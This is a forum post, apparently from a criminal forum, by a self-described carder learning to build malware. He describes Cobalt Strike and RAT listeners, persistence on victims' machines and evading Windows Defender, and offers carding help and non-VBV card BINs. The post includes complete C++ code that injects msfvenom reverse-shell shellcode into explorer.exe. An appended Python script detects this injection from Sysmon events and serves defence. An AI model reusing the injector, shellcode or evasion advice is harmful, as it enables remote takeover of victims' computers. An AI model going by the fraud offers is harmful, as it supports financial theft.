Please note that this user is banned.
Hello everyone
First, what I want to say is that I don't have any previous knowledge of creating less detectable malware. My knowledge is only in fraud/carding setup and settings, but malware is a different niche.
I work on Arch Linux; that's my main distro, where I run virtual machines (Windows 7/10/11). I don't have any knowledge of coding/programming, but I want to get it, and after I earn decent money, move from my state and start somewhere else.
That's not important; I just wanted to show how bad I am, and much of the information I'll be asked about could be total bullshit. Anyway, my poor English makes that level worse.
Sorry for the English and the text formatting; I wrote this at 3 am.
I created my personal plan and idea called "3 steps to earn":
- Listener
- Make less detectable
- Share
It probably sounds easy, but I've been fighting with it for almost one month. On the Listener step I was not sure what exactly to use. Like a total oldschooler I used Metasploit Framework and a cracked Venom RAT; after some time some users on xss.pro shared Cobalt Strike. At first I was confused because it generates HTTP reverse TCP, and in YouTube tutorials/guides on the clearnet everyone uses reverse TCP. I don't really understand why, when it works the same (from my view).
For example, can someone explain to me why tutorials use reverse TCP when reverse HTTP works the same? (from my view)
For one week I was solving how to port-forward and hack computers that are not on my network. Simple: I switched from an Arch VPS to Debian and it started working without problems. Some days later I solved why Cobalt is not persistent/permanent, why after the victim reboots the PC it is not loaded again, but again some users helped me, so when you read this, thanks once again.
my previous posts https://xss.pro/threads/81630/ , https://xss.pro/threads/81342/
Step "make less detectable": I'm not focused on companies/businessmen, so I don't really need 0/26 FUD. From my personal experience the most important is Windows Defender; some users use Avast/ESET (US-based), so I don't really need FUD. I searched on these forums or even the clearnet and I found some scripts; let me paste:
#include <iostream>
#include <Windows.h>
#include <tlhelp32.h>
#include <locale>
#include <string>
using namespace std;

HANDLE GetProcesHandleName() {
    HANDLE ProcessHandle;
    PROCESSENTRY32 procEntry;
    procEntry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE allProcesses;
    allProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(allProcesses, &procEntry) == TRUE) {
        while (Process32Next(allProcesses, &procEntry) == TRUE) {
            wchar_t newtargetProcName[1024] = L"explorer.exe";
            if (wcscmp(procEntry.szExeFile, newtargetProcName) == 0) {
                cout << "Process ID Found! PID: " << procEntry.th32ProcessID << "\n";
                ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procEntry.th32ProcessID);
                return ProcessHandle;
            }
        }
    }
}

int main()
{
    HANDLE hProcess;
    SIZE_T dwSize = 461;
    DWORD flAllocationType = MEM_COMMIT | MEM_RESERVE;
    DWORD flProtect = PAGE_EXECUTE_READWRITE;
    LPVOID memAddr;
    SIZE_T bytesOut;
    hProcess = GetProcesHandleName();
    // msfvenom -p windows/x64/shell_reverse_tcp LHOST=xx.xx.xx.xx LPORT=1337 -f c
    unsigned char buf[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"
        "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
        "\x49\x89\xe5\x49\xbc\x02\x00\x05\x39\x23\xaa\xf5\x3e\x41\x54"
        "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
        "\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
        "\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
        "\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
        "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
        "\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
        "\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
        "\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
        "\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
        "\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
        "\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
        "\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
        "\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
        "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
        "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";
    memAddr = VirtualAllocEx(hProcess, NULL, dwSize, flAllocationType, flProtect);
    cout << "[+] Memory Allocated at:" << memAddr << "\n";
    WriteProcessMemory(hProcess, memAddr, buf, dwSize, &bytesOut);
    cout << "[+] Number of bytes written: " << bytesOut << "\n";
    CreateRemoteThread(hProcess, NULL, dwSize, (LPTHREAD_START_ROUTINE)memAddr, 0, 0, 0);
    return 0;
}
So this is very trivial code, but I don't care; I just wanted to build it like the guides say, but there I got complications which I cannot solve.
Like the first one: I used Visual Studio Code and thought it's the same as Visual Code, but it's something else. I don't know why Microsoft named them so similarly.
On Linux I get errors like windows.h, because native Linux doesn't have it, so I read to use Wine to generate it, or even GCC, but it's so complicated and each try to build it gives me a different error.
(I really don't understand that properly, so sorry if it's bullshit or not correct info.)
I read that people recommend using Windows to build, so I started a VM.
Windows 7 probably doesn't support Visual Code 2019; I manually installed .NET Framework but it doesn't work.
Windows 10 is for me the shittiest Windows, because some .NET Frameworks like 3.7 or 4.7.2 were not supported, so I was just WTF when for some other people it worked.
I followed some videos on how to enable it, but it doesn't work, and to be honest Windows is the most boring OS and I hate it.
Now the biggest fun, Windows 11, which is total spyware: with 4096 MB RAM and 3 CPUs it's lagging and starts lagging my main Linux too, so it's very hard to even run Windows 11. When I run Visual Code it gets spikes, or even Oracle VM stops working. For this reason I respect only Windows 7, which is good for opsec too.
So my question is: what to do? Some ideas, tips, or even if someone shares a guide or recommends me something.
I never thought building/compiling a project from C++ to exe could be so complicated, and it's almost one week that I cannot move on.
I want to thank everyone who helped me previous times or even just gave me info, because I respect this forum. I wrote a carding/fraud guide like one month ago,
or I can even share non-VBV BINs if someone really helps me.
Anyway, if someone with this knowledge wants help with carding, I'll do that (simple: you help me, I help you).
Thanks once again, Made by Backstab
Tomorrow I'll edit this post and write it more formally and correctly.
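As an added defender-side example (not from the original post or its author): the pasted snippet's chain of CreateToolhelp32Snapshot, OpenProcess(PROCESS_ALL_ACCESS), VirtualAllocEx, WriteProcessMemory and CreateRemoteThread is the pattern Sysmon records as Event ID 10 (ProcessAccess, with the granted access mask) followed by Event ID 8 (CreateRemoteThread) whose StartModule field is empty, because the new thread starts in memory that no loaded module backs. The script below parses constructed key=value records shaped like those two events (the inject.exe path, the svchost/csrss lines and the hex addresses are all made up) and correlates them per source/target pair, so a single full-access handle or a single module-backed remote thread alone does not alert.

```python
"""Correlate Sysmon-style ProcessAccess (EID 10) and CreateRemoteThread (EID 8)
records to spot the classic remote-thread injection pattern.
Added example; the records below are constructed, not real telemetry."""
import re

# PROCESS_ALL_ACCESS on Vista and later (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF)
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed sample records in a flattened key=value form mimicking Sysmon fields.
SAMPLE_EVENTS = [
    # an unknown user-profile binary opens explorer.exe with full access ...
    "EventID=10 SourceImage=C:\\Users\\u\\inject.exe TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1FFFFF",
    # ... and then starts a thread there whose start address is not inside any module
    "EventID=8 SourceImage=C:\\Users\\u\\inject.exe TargetImage=C:\\Windows\\explorer.exe StartAddress=0x000001D4C3F10000 StartModule= StartFunction=",
    # benign: limited access (PROCESS_QUERY_LIMITED_INFORMATION) from a system binary
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1000",
    # benign: remote thread whose start address is backed by ntdll.dll
    "EventID=8 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\explorer.exe StartAddress=0x00007FF8A1B2C3D0 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart",
]


def parse_event(line: str) -> dict:
    """Split a record into a dict; a field like 'StartModule=' yields an empty string."""
    return dict(re.findall(r"(\w+)=(\S*)", line))


def grants_full_access(ev: dict) -> bool:
    """EID 10 where the granted mask covers all of PROCESS_ALL_ACCESS."""
    if ev.get("EventID") != "10":
        return False
    mask = int(ev.get("GrantedAccess", "0"), 16)
    return mask & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS


def unbacked_remote_thread(ev: dict) -> bool:
    """EID 8 whose start address Sysmon could not map to a loaded module."""
    return ev.get("EventID") == "8" and ev.get("StartModule", "") == ""


def find_injectors(lines) -> list:
    """Return sorted (source, target) pairs that both obtained a full-access
    handle and started an unbacked remote thread in that target."""
    full_access, unbacked = set(), set()
    for line in lines:
        ev = parse_event(line)
        pair = (ev.get("SourceImage", ""), ev.get("TargetImage", ""))
        if grants_full_access(ev):
            full_access.add(pair)
        if unbacked_remote_thread(ev):
            unbacked.add(pair)
    return sorted(full_access & unbacked)


if __name__ == "__main__":
    for src, tgt in find_injectors(SAMPLE_EVENTS):
        print(f"[!] remote-thread injection pattern: {src} -> {tgt}")
```

On a real host the same logic runs over Sysmon's XML event data (fields of the same names) rather than flattened lines; the correlation key and the two predicates do not change. Tuning usually means allow-listing known module-backed starters such as csrss.exe and debuggers, not relaxing the empty-StartModule test.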